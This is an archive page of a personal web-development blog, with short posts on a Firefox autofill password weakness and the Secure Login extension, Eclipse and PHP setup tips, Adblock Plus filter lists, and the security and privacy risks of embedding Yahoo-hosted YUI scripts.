Archive for 'Web Dev/Tech'

New Trick to get Browsers to Expose Passwords

CyberNet News wrote a post titled “Firefox Password Manager Exposes Passwords - Most Secure Browser?” which talks about a new phishing technique.

Essentially, if you use a password manager like the one in FireFox, which auto-fills the username and password fields in a form, you are susceptible to attack. Once the form is auto-populated, a web site can use JavaScript to grab the credentials out of the form. If you read the details, you understand that the attack can only happen on the same domain, but think about how many web sites that attack could happen on - Blogger (Google account info), MySpace, etc. The article gives three possible solutions, including not using the password manager and turning off JavaScript.

The third option was to use a browser extension called Secure Login. The Secure Login extension acts as hooks into Firefox’s Password Manager. All the credentials are still handled by Firefox, but Secure Login will prevent usernames/passwords from being auto-populated in a form. It will give you visual cues that it can fill in the form, and then you must initiate the populating of the fields. That gives you a stop-gap in case you don’t want the form to be auto-populated right away. I’ve used it for a day, and the extension works pretty well.

User comments in the article said Opera has had this feature built in for awhile, and suggested using Opera instead. While its great to see Opera was ahead of the game, I personally haven’t been able to get comfortable enough with Opera yet to consider a switch. It just doesn’t feel natural to me for some reason when I’m surfing.

If you happen to be like me, and use Firefox and its password manager, take a look a the Secure Login extension to help prevent this new phishing technique.

10 things to know before you register a domain name

Sometimes I get asked what is involved in registering a domain name, and is there anything to be careful of. I just ran across this site which does a good job of listing out most of the concerns to watch for when choosing an organization to register a domain name with:

10 things you MUST know before you register a domain name with anyone

Which side are you on?

In my career involved with web development, I’ve gone from more Microsoft-oriented development (ASP, Commerce Server, etc) to Open Source/Java (Apache, PHP, MySQL, JSPs, WebSphere, etc), to getting more involved with Microsoft again (SharePoint, .NET/C#, SQL, IIS). The latter transition is still an ongoing occurrence – my time is split between Microsoft and LAMP, but over the last year and a half I’ve come to reflect on some things and the way I viewed the “opposing” camp (whichever it may have been at the time).

At this juncture in my career I find that I resonate very much with the summary of this post by Jeff Atwood:

Giving Up on Microsoft

As a software developer, you’re doing yourself a disservice by pledging allegiance to anything other than yourself and your craft– whether it’s Microsoft or the principle of free software. Stop with the us vs. them mentality.

Competition is good and is what drives innovation; I am a firm believer in this principle. I even understand strongly disliking a product. There are major products I don’t like and don’t want to support/use. I also have my share of distrust for the “good will/do no evil” of many of the major players.

But if you are someone who has an emotional disdain for anything written in a certain language just because it is Microsoft/Open Source/”not Microsoft”, I don’t really want to have you on my team. That attitude tells me you’re more about protecting your personal “religion” than matching business value with a job well done. Instead of looking at business value and working as a team to apply technology towards the solution, you’re about protecting your technology dogma.

No thank you. You’re not a fun person to work with.

Removing recent workspaces in Eclipse menu

When Eclipse 3.2 launches, it asks you which workspace you would like to work in. To help you remember the workspaces you’ve been in, Eclipse provides you a drop-down menu of workspaces you have recently been in.

If you ever find that you have a defunct workspace listed in the menu, as I did, here is how you can manually remove it.

1. Find the following file:
   (eclipse-home)\configuration\.settings\org.eclipse.ui.ide.prefs
2. Open the file, and look for the line that starts with: RECENT_WORKSPACES
3. The workspaces are separated by commas, so delete whichever workspace you no longer want in the drop-down menu.
4. Save the file.

Enjoy a clean startup menu!

Firefox - Opening searches in a new tab

Best Firefox tip I’ve seen in awhile.

GoodSearch: Powered by Yahoo! - Stat Tracking by Google

I came across GoodSearch today, which is a really cool concept. Select the charity of your choice, and for every search about $0.01 will be contributed to your chosen charity. I debated on a couple different organizations, but am currently choosing Tiny Stars.

The weird thing is, the GoodSearch search engine is powered by Yahoo, but I happened to notice they are embedding Google Analytics for site tracking. Weird! That reminds me of a kid in junior high who used to deck himself out in complete Nike outfits, and then wear Reebok shoes. This is exactly like that, but not.

Use Adblock Plus without Filterset.G Updator

In a previous post, I mentioned what I thought was an issue with the Adblock Plus extension for Mozilla Firefox. The extension’s author, Wladimir Palant, was kind enough to post a comment in response. He tracked down the issue to a faulty rule in the Filterset.G adblocking ruleset, and had submitted a bug report with the Filterset.G group.

However, he also pointed me to part of the Adblock Plus FAQ that says it’s not good to use the Adblock Filterset.G Updater extension with Adblock Plus, and that there are actually some conflicts. I had been using them together for quite some time and didn’t realize this! The recommendation is to pick a different, supported list to subscribe to inside of the Adblock Plus extension.

After reading Mr. Palant’s comment, I uninstalled the Filterset.G Updater extension, cleared the existing rules in Adblock Plus to start over, and subscribed to EasyList (USA) inside of the Adblock Plus options. Things look good!

Think before you embed hosted YUI

Recently, Yahoo announced they would allow free hosting of their Yahoo! User Interface (YUI) JavaScript and CSS libraries to any site which used them. Yahoo promises gzip compression, smart caching, and the stability of the Yahoo network if you embed their javascript and css files. After seeing the announcement, I read several posts which declared this the best thing ever for JavaScript libraries, and that this meant Yahoo had “won” the library wars.

If you use YUI, or were thinking about it, this may all sound great! Just reference their hosted files in your site and you’re good to go! However, be careful. You are opening up your site to issues you may not have considered. For example:

Security

If you embed something hosted third party into your web site, you are giving that web site first-class access to your web site and all visitors to your web site. Yahoo can now access your scripts on your web pages. Yahoo can now access any cookies you set on visitors’ browsers.

Sometimes you actually do want to allow access like this to certain third parties. For instance, to track web statistics for your web site, you can embed WebTrends’ own script from their servers, and they in turn can then create a ‘first-class’ cookie to act as though it is coming from your domain. WebTrends does this so more users will allow the cookie since it appears to be only being used from your domain. This type of access is actually a feature in this case, and could be a selling point for you as you look for web analytics services.

However, in the case of something like a hosted, UI-based JavaScript library, you need to really think about whether the domain hosting the file needs that kind of access to your web site and your visitors.

Reliability

If Yahoo changes their API and it conflicts with your scripts, or introduces a bug into their hosted files, your web site is horked. If Yahoo changes their files, and those changes cause problems with your web site, those problems will be immediately live on your site. There is no ‘dev’ environment in this scenario to test changes. You have no control.

Privacy

This is related to the bullet on security, but Yahoo can now track all of your visitors for their purposes. They can track any information available through regular web traffic logs, since the files are being pulled from their web site. They potentially also have the ability to read and set cookies.

Yahoo has a paragraph at the bottom of the blog post making the announcement that says:

“Usage of this service will be recorded in Yahoo!’s Web traffic logs. We can assure you that our intent is simply to provide a convenience to the YUI developer community. If the record left in Yahoo!’s logs would compromise the privacy of your users, do not use this service.”

This sounds fairly low-key. However, on the embed page, there is this paragraph under the Terms of Use headline:

“Yahoo!’s hosting of YUI files is covered by all applicable sections of the Terms of Use governing Yahoo! APIs; your use of YUI files from Yahoo!’s servers constitutes an agreement to those terms. Access of YUI files from Yahoo!’s servers will be recorded in Yahoo!’s Web traffic logs. Please be sure that this usage is fully consistent with your own user privacy agreement before deploying YUI files from Yahoo! servers as part of your application.”

Make no mistake; Yahoo plans to garner usage information from your site’s visitors. They even say that you should make sure your site’s privacy statement agrees with theirs before serving their files. You may be alright with this, and it may not bother you or your site’s visitors. However, make sure you understand these privacy issues before embedding their library. Trust is an easy thing to lose, and hard to gain back.

Redundant

Why do you need Yahoo to host script libraries for you? If your server has downtime issues, it’s not going to matter if your visitors can download the YUI or not. If your site is down, it’s down. Considering some of the potential ‘costs’ of embedding from Yahoo’s servers, make sure you have good reason for doing it.

Installing PHP 5 on Windows Server 2003 with IIS 6

If you have the need, here is a great guide on How to install PHP 5.x on Windows Server 2003 with IIS 6.

My experience with PHP has always been on Linux, but now I have PHP 5.2.1 running successfully on a Win2003 machine, talking to a remote SQL Server.

Update: Using the guide above, I could use PHP’s OBDC functions to connect, but I couldn’t use the mssql functions or libraries like MDB2. To get those to work, I needed to make sure I had a recent version of ntwdblib.dll in both my PHP installation directory and C:\Windows\System32 directory. After running an iisreset, I could connect using both mssql and MDB2.

CIW – Vendor Neutral? Yes. Adblock-safe? No.

I was just sitting down to write a positive article about my recent Certified Internet Webmaster (CIW) certification experience, and then I noticed their home page is messed up in Mozilla Firefox 2. Click the thumbnail to see the jacked-upness.

What’s the deal?? I sent them a message about it. They need to fix that like yesterday.

Update: After a little more testing, I found that the web site does display correctly in Firefox. The issue is with the Adblock Plus and Adblock Filterset.G Updater add-ons. When those extensions are enabled, the CIW home page becomes broken. Apparently the developers at CIW named some of their featured navigation area images file names like “ad01_start.jpg”. Adblock must see the “ad01″ part of the name, and block it out. That was a poor decision to name parts of their navigation as though they are external ads. Hopefully they change their naming scheme soon.

Update II: See the first comment below from Wladimir Palant, AdBlock Plus’s creator. The issue is with the Filterset.G subscription add-on, not with AdBlock Plus.

Search for:

Recent Posts

• Book Recommendation: MOSS 2007 Best Practices
• “Minority Report” computer interaction is here!
• Just because…
• links for 2008-10-07
• Leaving the flower for the Delicious

Categories

• Current Events (48)
• Entertainment (62)
• General (53)
• Links-Post (3)
• Security (17)
• SharePoint (4)
• Web Dev/Tech (130)

Tags

Apple blogs book browsers delicious eclipse Entertainment financial Firefox fix google ie iTunes linux lists microsoft MS Office mtb photos photoshop Photoshop Elements php regex RSS Safari Security SharePoint Silverlight software ssl Thunderbird training video Vista vmware webpart wireless workflow

Recent Comments

• Tyler Style on Thunderbird Stuck in Endless Upgrade
• zoly on Thunderbird Stuck in Endless Upgrade
• baloo on A great z-index tutorial (advanced)
• Migrating from Nucleus to Wordpress | The Reconstruction on Moving from Nucleus to Wordpress
• Dad on “Minority Report” computer interaction is here!

Del.icio.us Bookmarks

• Software Engineering for Internet Applications | MIT Press
• Parenting Compass
• Antivirus Software Roundup | Maximum PC
• Parenting Resolutions - Motherlode Blog - NYTimes.com
• Army Times
• IDF Spokesperson
• PlayStation 3 Secrets
• FIRE - Foundation for Individual Rights in Education
• PlayStation.Blog » Getting the Most from Speed Races in MotorStorm Pacific Rift
• MotorStorm: Pacific Rift - Fastest Vehicles for Each Track

meta

• RSS
• Comments RSS